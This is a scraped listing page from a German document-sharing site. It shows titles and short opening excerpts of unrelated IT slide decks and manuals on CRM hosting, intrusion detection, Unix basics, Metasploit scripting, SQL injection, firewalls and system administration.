Technische Voraussetzungen für f r CRM Hosting

Technische Voraussetzungen für f r CRM Hosting Technische Voraussetzungen für f r CRM Hosting Holger Rackow Technologieberater - Microsoft Dynamics CRM Microsoft Dynamics CRM 3.0 Wo stehen wir heute? Microsoft CRM weltweites Kundenwachstum 53 Länder,

Mehr

Intrusion Detection and Prevention

Intrusion Detection and Prevention Intrusion Detection and Prevention 19-05-2008: Chaos Computer Club Lëtzebuerg 21-05-2008: Chaos Computer Club Trier Vortragender: Kabel Aufbau Einführung - Was ist Intrusion Detection - Unterschiede zwischen

Mehr

Marketing Update. Enabler / ENABLER aqua / Maestro II

Marketing Update. Enabler / ENABLER aqua / Maestro II Marketing Update Enabler / ENABLER aqua / Maestro II Quartal 01/2013 1 Kommentar des Herausgebers Liebe Kunden und Partner, dieser Marketing Update gibt Ihnen einen kurzen Überblick über die aktuell verfügbaren

Mehr

Literatur. Einführung in Unix. Login. Passwort. Mag. Thomas Griesmayer. Benutzererkennung und Passwort Case-Sensitiv Prompt

Literatur. Einführung in Unix. Login. Passwort. Mag. Thomas Griesmayer. Benutzererkennung und Passwort Case-Sensitiv Prompt Literatur Einführung in Unix Introduction to Unix Martin Weissenböck: Linux, 2000, 2. Auflage, Adim Bodo Bauer: SuSE Linux 6.2, Installation, Konfiguration und erste Schritte, 1999, 15. Auflage, SuSE Verlag.

Mehr

6.6 Erweiterte Metasploit-Resource-Skripte

6.6 Erweiterte Metasploit-Resource-Skripte 264 6 Automatisierungsmechanismen und Integration von 3rd-Party-Scannern durch die vorhandene Benutzerinteraktion häufig essenziell, eine möglichst schnelle und sichere Prozessmigration durchzuführen.

Mehr

Sinn und Unsinn von Desktop-Firewalls

Sinn und Unsinn von Desktop-Firewalls CLT 2005 Sinn und Unsinn von Desktop-Firewalls Wilhelm Dolle, Director Information Technology interactive Systems GmbH 5. und 6. März 2005 1 Agenda Was ist eine (Desktop-)Firewall? Netzwerk Grundlagen

Mehr

HANDBUCH LSM GRUNDLAGEN LSM

HANDBUCH LSM GRUNDLAGEN LSM Seite 1 1.0 GRUNDLAGEN LSM 1.1. SYSTEMVORAUSSETZUNGEN AB LSM 3.1 SP1 (ÄNDERUNGEN VORBEHALTEN) ALLGEMEIN Lokale Administratorrechte zur Installation Kommunikation: TCP/IP (NetBios aktiv), LAN (Empfehlung:

Mehr

Zürich, 18. Februar 2003 Oli Sennhauser Trivadis AG. Integration von Windows-Servern in das Telekurs Environment mittels Cygwin

Zürich, 18. Februar 2003 Oli Sennhauser Trivadis AG. Integration von Windows-Servern in das Telekurs Environment mittels Cygwin Zürich, 18. Februar 2003 Oli Sennhauser Trivadis AG Integration von Windows-Servern in das Telekurs Environment mittels Cygwin Agenda A. Was ist Cygwin? B. Einsatz an der Telekurs C. Demo 2 Was ist Cygwin

Mehr

Verzeichnisdienste in heterogenen Systemen

Verzeichnisdienste in heterogenen Systemen Verzeichnisdienste in heterogenen Systemen Zielsetzungen Implementierung Aufbau: Active Directory (AD) auf Basis von Windows Server 008 R mit Windows Client(s), Linux Client(s) und einem Linux Server (Dateiserver).

Mehr

VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer. Kommunikation I (Internet) Übung 1 Telnet und FTP

VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer. Kommunikation I (Internet) Übung 1 Telnet und FTP VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer Kommunikation I (Internet) Übung 1 Telnet und FTP SS 2003 Inhaltsverzeichnis 2. Übungen mit Telnet und FTP...1 2.1. Testen der Verbindung mit ping...1 2.2. Arbeiten

Mehr

Verteilte Administration mit STAF (Software Testing Automation Framework)

Verteilte Administration mit STAF (Software Testing Automation Framework) UnFUG (Unix Friends and User Group der FH Furtwangen) Verteilte Administration mit STAF (Software Testing Automation Framework) Tobias Walter (tobias@unwichtig.org) http://www.unwichtig.org 13. Januar

Mehr

Marketing Update. Enabler / ENABLER aqua / Maestro II

Marketing Update. Enabler / ENABLER aqua / Maestro II Marketing Update Enabler / ENABLER aqua / Maestro II Quartal 01/2012 1 Kommentar des Herausgebers Liebe Kunden und Partner, dieser Marketing Update gibt Ihnen einen kurzen Überblick über die aktuell verfügbaren

Mehr

Symbio system requirements. Version 5.1

Symbio system requirements. Version 5.1 Symbio system requirements Version 5.1 From: January 2016 2016 Ploetz + Zeller GmbH Symbio system requirements 2 Content 1 Symbio Web... 3 1.1 Overview... 3 1.1.1 Single server installation... 3 1.1.2

Mehr

Vertraulichkeit für sensible Daten und Transparenz für ihre Prozesse

Vertraulichkeit für sensible Daten und Transparenz für ihre Prozesse Vertraulichkeit für sensible Daten und Transparenz für ihre Prozesse Christian Kreß General Manager SSH Communications Security christian.kress@ssh.com WE ENABLE, MONITOR & MANAGE ENCRYPTED NETWORKS Agenda

Mehr

SolarWinds Engineer s Toolset

SolarWinds Engineer s Toolset SolarWinds Engineer s Toolset Diagnostic Tools Das Engineer s Toolset ist eine Sammlung von 49 wertvoller und sinnvoller Netzwerktools. Die Nr. 1 Suite für jeden Administrator! Die Schwerpunkte liegen

Mehr

Titelbild1 ANSYS. Customer Portal LogIn

Titelbild1 ANSYS. Customer Portal LogIn Titelbild1 ANSYS Customer Portal LogIn 1 Neuanmeldung Neuanmeldung: Bitte Not yet a member anklicken Adressen-Check Adressdaten eintragen Customer No. ist hier bereits erforderlich HERE - Button Hier nochmal

Mehr

Intrusion Detection Systeme. Definition (BSI) Alternative Definition IDS

Intrusion Detection Systeme. Definition (BSI) Alternative Definition IDS Intrusion Detection Systeme IDS 1 Definition (BSI) Aktive Überwachung von Systemen und Netzen mit dem Ziel der Erkennung von Angriffen und Missbrauch. Aus allen im Überwachungsbereich stattfindenen Ereignissen

Mehr

5 Schritte zur IT-Sicherheit. Johannes Nöbauer Leiter Enterprise Services

5 Schritte zur IT-Sicherheit. Johannes Nöbauer Leiter Enterprise Services 5 Schritte zur IT-Sicherheit Johannes Nöbauer Leiter Enterprise Services 5 (einfache) Schritte zur IT-Sicherheit Sicherheitsupdates für Betriebssysteme installieren Sicherheitsupdates für alle Anwendungen

Mehr

Effizienz im Vor-Ort-Service

Effizienz im Vor-Ort-Service Installation: Anleitung SatWork Integrierte Auftragsabwicklung & -Disposition Februar 2012 Disposition & Auftragsabwicklung Effizienz im Vor-Ort-Service Disclaimer Vertraulichkeit Der Inhalt dieses Dokuments

Mehr

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165 Linux basierendes NAS auf Seagate Goflex Net installieren Christian Eppler 21162, Stefan Möbius 21165 Inhaltsverzeichnis Wieso das Ganze? Nachteile Pogoplug/Debian Vorteile Pogoplug/Debian Wieso diese

Mehr

Compliance mit dem IEM Endpoint Manager durchsetzen

Compliance mit dem IEM Endpoint Manager durchsetzen Compliance mit dem IEM Endpoint Manager durchsetzen PPPvorlage_sxUKMvo-05.00.potx santix AG Mies-van-der-Rohe-Straße 4 80807 München www.santix.de santix AG 2 Sicherheit in der IT Was bedeutet Sicherheit

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Release Notes scvenus 2.3.0

Release Notes scvenus 2.3.0 Juni 2008 IT Services Release Notes scvenus 2.3.0 Operational Concepts Security Solutions Technische Release Notes Was ist neu? Neue Betriebssysteme Vertrieb E-Mail-Support / Mailingliste Webportal und

Mehr

Raspberry PI als AirPrint Server

Raspberry PI als AirPrint Server Übernommen von http://www.welzels.de/blog Raspberry PI als AirPrint Server Eigentlich bin ich recht zufrieden mit meinem Drucker, sei es von der Qualität oder auch von der Ausstattung. Es handelt sich

Mehr

Aufbau einer Testumgebung mit VMware Server

Aufbau einer Testumgebung mit VMware Server Aufbau einer Testumgebung mit VMware Server 1. Download des kostenlosen VMware Servers / Registrierung... 2 2. Installation der Software... 2 2.1 VMware Server Windows client package... 3 3. Einrichten

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung } Warum ist Sicherheit ein Software Thema? } Sicherheit in heutigen Softwareprodukten & Trends } OWASP Top 10 Kategorien Hacking Demo } SQL Injection: der Weg zu

Mehr

Java Application 1 Java Application 2. JDBC DriverManager. JDBC-ODBC Br idge. ODBC Driver Manager. Dr iver C. Dr iver D.

Java Application 1 Java Application 2. JDBC DriverManager. JDBC-ODBC Br idge. ODBC Driver Manager. Dr iver C. Dr iver D. 1 Copyright 1996-1997 by Axel T. Schreiner. All Rights Reserved. 7 Datenbankzugriff Prinzip Dieser Abschnitt beschäftigt sich mit dem Paket java.sql, das eine SQL-Schnittstelle für Java verkapselt. Java-Programme

Mehr

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr.

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr. Installation und Konfiguration Version 1.4 Stand 21.11.2013 TimeMachine Dokument: install.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor

Mehr

http://www.stud.uni-potsdam.de/~hoeffi/gdb.html#wozu

http://www.stud.uni-potsdam.de/~hoeffi/gdb.html#wozu gdb: debugging code In der Vorlesung hatte ich Teile von http://www.stud.uni-potsdam.de/~hoeffi/gdb.html#wozu und ein eigenes Beispiel diskutiert. Ein Debugger soll helfen Fehler im Programm, die sich

Mehr

Isabel Arnold CICS Technical Sales Germany Isabel.arnold@de.ibm.com. z/os Explorer. 2014 IBM Corporation

Isabel Arnold CICS Technical Sales Germany Isabel.arnold@de.ibm.com. z/os Explorer. 2014 IBM Corporation Isabel Arnold CICS Technical Sales Germany Isabel.arnold@de.ibm.com z/os Explorer Agenda Introduction and Background Why do you want z/os Explorer? What does z/os Explorer do? z/os Resource Management

Mehr

Mac OS X Consoliero: Terminal Solutions Version 1.0

Mac OS X Consoliero: Terminal Solutions Version 1.0 Mac OSX Consoliero Terminal Solution Seite: 1/11 Mac OS X Consoliero Weiterführende Dokumentationen für Administratoren. Mac OS X Consoliero: Terminal Solutions Version 1.0 Christoph Müller, PTS Mac OSX

Mehr

Readme-USB DIGSI V 4.82

Readme-USB DIGSI V 4.82 DIGSI V 4.82 Sehr geehrter Kunde, der USB-Treiber für SIPROTEC-Geräte erlaubt Ihnen, mit den SIPROTEC Geräten 7SJ80/7SK80 über USB zu kommunizieren. Zur Installation oder Aktualisierung des USB-Treibers

Mehr

NVR Mobile Viewer for iphone/ipad/ipod Touch

NVR Mobile Viewer for iphone/ipad/ipod Touch NVR Mobile Viewer for iphone/ipad/ipod Touch Quick Installation Guide DN-16111 DN-16112 DN16113 2 DN-16111, DN-16112, DN-16113 for Mobile ios Quick Guide Table of Contents Download and Install the App...

Mehr

Cameraserver mini. commissioning. Ihre Vision ist unsere Aufgabe

Cameraserver mini. commissioning. Ihre Vision ist unsere Aufgabe Cameraserver mini commissioning Page 1 Cameraserver - commissioning Contents 1. Plug IN... 3 2. Turn ON... 3 3. Network configuration... 4 4. Client-Installation... 6 4.1 Desktop Client... 6 4.2 Silverlight

Mehr

Backtrack 5. Effektive Sicherheitstests selbst durchführen. Autor: Martin Schagerl. Letzte Änderung am 17.07.2012. Version 1.2

Backtrack 5. Effektive Sicherheitstests selbst durchführen. Autor: Martin Schagerl. Letzte Änderung am 17.07.2012. Version 1.2 Effektive Sicherheitstests selbst durchführen Autor: Martin Schagerl Letzte Änderung am 17.07.2012 Version 1.2 Lexon e.u., Inh. Martin Schagerl, Holzing 52, A 3252 Bergland T: +43 / 676 / 7119622, E: office@lexon.at,

Mehr

Advanced Persistent Threat

Advanced Persistent Threat Advanced Persistent Threat Ivan Bütler Compass Security AG, Schweiz Ivan.buetler@csnc.ch Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel.+41 55-214 41 60 Fax+41 55-214 41 61

Mehr

SNMP Kommandos für Alcatel-Lucent OmniSwitch Produkte

SNMP Kommandos für Alcatel-Lucent OmniSwitch Produkte 802.1x / MAC Address Authentication Abfragen der Port-Mobility Tabelle snmpwalk -v 2c -c public 192.168.10.1 1.3.6.1.4.1.6486.800.1.2.1.4.1.1.2.1 Abfragen des Mobility Settings für einen Port (in diesem

Mehr

Softwareanforderungen für Microsoft Dynamics CRM Server 2015

Softwareanforderungen für Microsoft Dynamics CRM Server 2015 Softwareanforderungen für Microsoft Dynamics CRM Server 2015 https://technet.microsoft.com/de-de/library/hh699671.aspx Windows Server-Betriebssystem Microsoft Dynamics CRM Server 2015 kann nur auf Computern

Mehr

BartPE. Dokumentation. Projektarbeit Network Services. Dozent: Wolf-Fritz Riekert. Belmondo Kovac. Autor: Andreas Dinkelacker, 3.

BartPE. Dokumentation. Projektarbeit Network Services. Dozent: Wolf-Fritz Riekert. Belmondo Kovac. Autor: Andreas Dinkelacker, 3. BartPE Dokumentation Projektarbeit Network Services Dozent: Wolf-Fritz Riekert Belmondo Kovac Autor: Andreas Dinkelacker, 3. Semester IWD, HdM Stuttgart, Fachbereich IuK Was ist BartPE und PE Builder?

Mehr

Was eine WAF (nicht) kann. Ausgabe 2013

Was eine WAF (nicht) kann. Ausgabe 2013 Was eine WAF (nicht) kann. Ausgabe 2013 Mirko Dziadzka http://mirko.dziadzka.de/ @MirkoDziadzka OWASP Stammtisch München - 19.11.2013 1 / 27 Inhalt Worum soll es heute gehen Meine (subjektive) Meinung

Mehr

KASPERSKY SECURITY FOR VIRTUALIZATION 2015

KASPERSKY SECURITY FOR VIRTUALIZATION 2015 KASPERSKY SECURITY FOR VIRTUALIZATION 2015 Leistung, Kosten, Sicherheit: Bessere Performance und mehr Effizienz beim Schutz von virtualisierten Umgebungen AGENDA - Virtualisierung im Rechenzentrum - Marktübersicht

Mehr

Archive / Backup System für OpenVMS

Archive / Backup System für OpenVMS Archive / Backup System für OpenVMS DECUS Symposium 2002 Bonn Vortrag-Nr. 3C04 Günther Fröhlin Compaq Computer Corporation Colorado Springs, USA 1 Highlights V4.0 Auslieferung Januar 2002 Hauptversion

Mehr

Grundlegende Informationen zur Einrichtung des SSLVPN beim DSR-1000N/DSR-500N(FW 1.03B27).

Grundlegende Informationen zur Einrichtung des SSLVPN beim DSR-1000N/DSR-500N(FW 1.03B27). Grundlegende Informationen zur Einrichtung des SSLVPN beim DSR-1000N/DSR-500N(FW 1.03B27). Szenario: Benutzer möchte aus dem Ausland eine verschlüsselte Verbindung über das Internet in sein Netzwerk herstellen

Mehr

Phion Netfence Firewall Mag. Dr. Klaus Coufal

Phion Netfence Firewall Mag. Dr. Klaus Coufal Phion Netfence Firewall Mag. Dr. Klaus Coufal Übersicht I. Konzepte II. Installation und Konfiguration III. High Availability IV. Firewall V. VPN Server VI. Management Center VII. Addons Mag. Dr. Klaus

Mehr

Powershell DSC Oliver Ryf

Powershell DSC Oliver Ryf 1 Powershell DSC Oliver Ryf Partner: 2 Agenda Begrüssung Vorstellung Referent PowerShell Desired State Configuration F&A Weiterführende Kurse 3 Vorstellung Referent Seit 1991 IT-Trainer 1995 MCSE und MCT

Mehr